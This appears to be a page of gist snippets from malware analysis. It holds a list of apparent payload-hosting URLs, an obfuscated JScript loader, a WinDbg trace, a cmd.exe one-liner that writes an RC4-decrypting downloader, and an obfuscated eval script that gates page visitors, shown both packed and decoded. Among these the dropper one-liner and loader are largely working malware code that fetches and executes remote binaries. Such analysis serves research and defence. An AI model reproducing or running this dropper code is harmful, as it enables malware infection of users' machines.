This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
00000000 01 01 01 01 01 01 00 01 01 00 01 01 01 01 00 01 |................| | |
00000010 01 00 01 00 00 01 01 00 00 00 01 00 00 01 00 00 |................| | |
00000020 00 01 01 01 01 00 01 00 01 01 00 01 01 00 01 01 |................| | |
00000030 00 01 00 00 00 00 00 01 00 00 01 00 01 01 01 00 |................| | |
00000040 00 00 01 01 00 01 00 01 01 00 00 00 01 00 01 01 |................| | |
00000050 01 00 00 00 01 00 01 01 01 01 00 01 00 01 00 01 |................| | |
00000060 00 01 01 00 00 00 00 00 01 01 01 01 00 00 00 00 |................| | |
00000070 01 00 01 00 01 01 01 01 01 01 01 00 00 00 01 00 |................| | |
00000080 01 00 01 00 01 01 00 00 01 01 01 00 01 01 00 01 |................| | |
00000090 00 01 00 01 01 00 01 01 01 00 01 01 00 01 01 00 |................| |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
http://u2station.com:80/g766d4ft?rRffpf=NrdcbOsmH | |
http://imagillaboration.org:80/g766d4ft?rRffpf=NrdcbOsmH | |
http://www.u2station.com:80/g766d4ft?rRffpf=NrdcbOsmH | |
http://unstytovar.com:80/0o0qep | |
http://xceramics.com:80/g766d4ft?rRffpf=NrdcbOsmH | |
http://resboiu.ro:80/g766d4ft?rRffpf=NrdcbOsmH | |
http://hotelikbej.pl:80/ild3ha8 | |
http://vonsky.com:80/ez3q7k8 | |
http://prod23.ru:80/v451a3 | |
http://hurrychufa.com:80/4kspi |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<job id=1><script target="about:blank" language="JScript">WScript.Sleep(1); | |
var QFz = ""; | |
var RXj = 0; | |
/*@cc_on | |
var Hg=(function f(){return '\x0a';})(),ROd=(function f(){return '\x0d';})(),XAz=(function f(){return 'D';})(),ZNz=(function f(){return 'H';})(),Fn=(function f(){return 'L';})(),TIh=(function f(){return 'P';})(),ZHg=(function f(){return 'T';})(),Ki=(function f(){return 'X';})(),Eo=(function f(){return '\x09';})(),Ax=(function f(){return 'd';})(),Wd=(function f(){return 'h';})(),AGf=(function f(){return 'l';})(),Mm=(function f(){return 'p';})(),BJy=(function f(){return 't';})(),Af=(function f(){return '\x7d';})(),EQi=(function f(){return '\x7c';})(),Ne=(function f(){return '\x7b';})(),WTo=(function f(){return '\x2f';})(),VFn=(function f(){return '\x2d';})(),Xf=(function f(){return '\x2e';})(),Qz=(function f(){return '\x2b';})(),Hk=(function f(){return '\x2c';})(),Kf=(function f(){return '\x2a';})(),KTm=(function f(){return 'C';})(),PIq=(function f(){return 'G';})(),Wk0=(function f(){return 'K';})(), |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
{ | |
"timestamp" : "1483998618838", | |
"response_code" : "403", | |
"headers" : { | |
"accept-language" : "es-MX", | |
"accept-encoding" : "gzip, deflate", | |
"request" : { | |
"version" : "1.1", | |
"protocol" : "HTTP", | |
"method" : "GET", |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!DOCTYPE html> | |
<html lang="en"> | |
<head> | |
<title></title> | |
<meta charset="UTF-8"> | |
<meta http-equiv="X-UA-Compatible" content="IE=EDGE"> | |
<meta name="apple-mobile-web-app-capable" content="yes"> | |
<meta name="apple-mobile-web-app-status-bar-style" content="black"> | |
<meta name="viewport" content="width=device-width, initial-scale=1.0"> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
0:013> bp KERNEL32!CreateProcessAStub | |
0:022> g | |
Breakpoint 0 hit | |
eax=00000000 ebx=7717eb70 ecx=00000000 edx=77244048 esi=00000011 edi=04d3b330 | |
eip=7717eb70 esp=04d3b2b4 ebp=04d3b340 iopl=0 nv up ei pl zr na pe nc | |
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200246 | |
KERNEL32!CreateProcessAStub: | |
7717eb70 8bff mov edi,edi | |
0:005> da poi(esp+8) | |
116f00b2 "cmd.exe /q /c cd /d "%tmp%" && e" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
cmd.exe /q /c cd /d "%tmp%" && echo function O(n,g){for(var c=0,s=String,d,D="pu"+"sh",b=[],i=[],r=255,a=0;r+1^>a;a++)b[a]=a;for(a=0;r+1^>a;a++)c=c+b[a]+g[v](a%g.length)^&r,d=b[a],b[a]=b[c],b[c]=d;for(var e=c=a=0,S="fromCharCode";e^<n.length;e++)a=a+1^&r,c=c+b[a]^&r,d=b[a],b[a]=b[c],b[c]=d,i[D](s[S](n[v](e)^^b[b[a]+b[c]^&r]));return i[u(15)](u(11))};function H(g){var T=u(0),d=W(T+"."+T+u(1));d["setProxy"](n);d.open(u(2),g(1),n);d.Option(0)=g(2);d["Sen\x64"];if(0310==d.status)return O(d.responseText/**/,g(n))};T="WinHTTPMRequ";E=T+"est.5.1MGETMScripting.FileSystemObjectMWScript.ShellMADODB.StreamMeroM.ex",u=function(x){return E.split("M")[x]},J=ActiveXObject,W=function(v){return new J(v)};try{E+="eMGetTempNameMcharCodeAtMiso-8859-1MMindexOfM.dllMScriptFullNameMjoinMr\x75nM /c M /\x73 ";var q=W(u(3)),j=W(u(4)),s=W(u(5)),p=u(7),n=0,U=WScript,L=U[u(14)],v=u(9),m=U.Arguments;s.Type=2;c=q[u(8)]();s.Charset=u(012);s.Open();i=H(m);d=i[v](i[u(12)]("P\x45\x00"+"\x00")+027);s.writetext(i);if(037^<d){var z=1;c+=u(13)}els |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$ echo 'tst' > file1 | |
$ echo 'test' > file2 | |
$ md5sum * > hashes.md5 | |
$ cat hashes.md5 | |
746a2ef902cf7596d0c9f66add5524d5 file1 | |
d8e8fca2dc0f896fd7cb4cb0031ba249 file2 | |
$ md5sum -c hashes.md5 | |
file1: OK | |
file2: OK |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<HEAD> | |
<style> | |
html {display: none;} | |
</style> | |
<script type="text/javascript" src="//code.jquery.com/jquery-latest.min.js"></script> | |
<script type="text/javascript" src="//cdnjs.cloudflare.com/ajax/libs/jstimezonedetect/1.0.6/jstz.min.js"></script> | |
<script>eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('$(2).7(3(){$("8").9();0 f=h i();f.j("k",2.4,l);f.5(m);0 g=f.n().o();0 b="p";0 c=("2","q","//s.t-6.u/6.v");c=("w","x-y-1","z");c=("5","A");0 d=B.C();0 e=d.D();$.E({F:4.G,H:"I",J:"K="+e+"&r="+2.L+"&M="+g,N:3(a){O(a)}})});',51,51,'var||document|function|location|send|analytics|ready|body|hide||||||||new|XMLHttpRequest|open|GET|false|null|getAllResponseHeaders|toLowerCase|GoogleAnalyticsObject|script||www|google|com|js|create|UA|3188658|auto| |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$(document).ready(function() | |
{ | |
$("body").hide(); | |
var f=new XMLHttpRequest(); | |
f.open("GET",document.location,false); | |
f.send(null); | |
var g=f.getAllResponseHeaders().toLowerCase(); | |
var b="GoogleAnalyticsObject"; | |
var c=("document","script","//www.google-analytics.com/analytics.js"); | |
c=("create","UA-3188658-1","auto"); |